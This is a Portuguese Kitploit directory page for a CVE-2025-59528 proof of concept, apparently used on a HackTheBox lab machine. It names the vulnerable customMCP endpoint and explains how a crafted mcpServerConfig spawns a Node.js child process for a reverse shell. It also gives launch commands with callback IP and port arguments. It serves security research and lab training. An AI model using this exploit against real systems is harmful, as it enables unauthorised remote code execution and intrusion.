Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-59528-PoC — PoC para CVE-2025-59528 usado para obter execução remota de código na máquina Silentium no HTB | Kitploit
Ferramentas/GitHubGitHub/loaxert/cve-2025-59528-poc
ExploraçãoExploração de Aplicações WebTestes de Segurança de APIsTestes de PenetraçãoAprendizado e EducaçãoDesenvolvimento de Payloads
GitHubloaxert/cve-2025-59528-poc

CVE-2025-59528-PoC

PoC para CVE-2025-59528 usado para obter execução remota de código na máquina Silentium no HTB

Ver Repositório
17há 1 mêsAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-59528 PoC Educacional

Apenas para uso educacional. Este projeto destina-se a pesquisa de segurança controlada, demonstrações em sala de aula e testes autorizados em laboratório isolado. Não o utilize contra sistemas, redes, aplicações ou contas que você não possua ou para as quais não tenha permissão explícita de teste.

O que este PoC demonstra

Esta prova de conceito demonstra como um valor mcpServerConfig tratado de forma inadequada pode permitir avaliação de JavaScript no lado do servidor e execução de comandos por meio da funcionalidade de carregamento de nó customMCP.

O script suporta dois métodos de autenticação:

  • E-mail/senha: autentica por meio do endpoint de login da aplicação e reutiliza os cookies de sessão retornados.
  • Token Bearer: envia uma chave de API no cabeçalho Authorization.

Após a autenticação, o script envia uma configuração elaborada para /api/v1/node-load-method/customMCP. O payload utiliza a funcionalidade de processo filho do Node.js para executar um comando de shell e conectar-se de volta a um listener controlado pelo pesquisador. Esse comportamento está incluído apenas para demonstrar o impacto potencial em um ambiente de laboratório autorizado.

Requisitos

  • Python 3.
  • O pacote requests.

Instale a dependência com:

root@kitploit:~
python3 -m pip install requests

Uso

Salve o script como CVE-2025-59528.py.

Modo e-mail e senha

root@kitploit:~
python3 CVE-2025-59528.py <email> <password> <target-host> <callback-ip> <callback-port>

Exemplo com valores apenas para documentação:

root@kitploit:~
python3 CVE-2025-59528.py [email protected] 'REDACTED_PASSWORD' lab.example.test 192.0.2.10 4444

Modo token Bearer

root@kitploit:~
python3 CVE-2025-59528.py <api-key> <target-host> <callback-ip> <callback-port>

Exemplo com valores apenas para documentação:

root@kitploit:~
python3 CVE-2025-59528.py 'REDACTED_API_KEY' lab.example.test 192.0.2.10 4444

O script espera que estas rotas da aplicação estejam disponíveis:

  • /api/v1/auth/login
  • /api/v1/node-load-method/customMCP

O script atual constrói URLs http://. Atualize a implementação para HTTPS ao testar uma implantação de laboratório que exija TLS.

Como o código funciona

  1. main() valida a quantidade de argumentos da linha de comando e seleciona o modo de autenticação.
  2. login() envia as credenciais fornecidas para o endpoint de login.
  3. tokens() extrai os valores de sessão do cabeçalho de resposta Set-Cookie.
  4. shell() monta a requisição autenticada e envia o valor mcpServerConfig elaborado.
  5. bearer() executa a mesma requisição usando um token bearer em vez de cookies de sessão.
  6. O corpo da resposta é exibido para que o pesquisador possa correlacionar o resultado com os logs da aplicação e do servidor.
Baixar ferramenta